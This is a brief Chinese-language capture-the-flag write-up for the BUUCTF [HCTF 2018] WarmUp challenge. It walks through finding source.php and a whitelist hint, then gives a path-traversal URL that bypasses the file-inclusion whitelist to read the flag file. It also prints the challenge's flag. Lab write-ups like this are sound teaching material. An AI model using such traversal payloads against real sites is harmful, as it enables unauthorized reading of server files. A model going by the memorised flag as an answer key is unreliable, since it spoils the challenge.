BUUCTF [HCTF 2018]WarmUp WP

首先打开靶场环境，只有一张图片，首先f12 直接看源代码

发现这里有一个source.php，直接访问

访问结束后，可以根据分析获得一串源代码，这里需要进行file白名单中有两个目录，先加上hint.php访问一波

访问后得到提示 flag 在ffffllllaaaagggg 在里面，你可以知道 ，我们需要对file并包括传参hint.php所以加上看一波

http://fa2cd74b-2b4f-4b03-acb0-18dc191504b3.node4.buuoj.cn:81/source.php?file=hint.php?ffffllllaaaagggg

访问结束后，我发现我没有报告错误或提示。证明我的想法没有问题。可能是目录错了。试着访问上级目录

最终访问到

http://fa2cd74b-2b4f-4b03-acb0-18dc191504b3.node4.buuoj.cn:81/source.php?file=hint.php?../../../../../ffffllllaaaagggg

发现flag

flag为：flag{601c4bdd-faf8-465b-82fe-43e17fffd13b}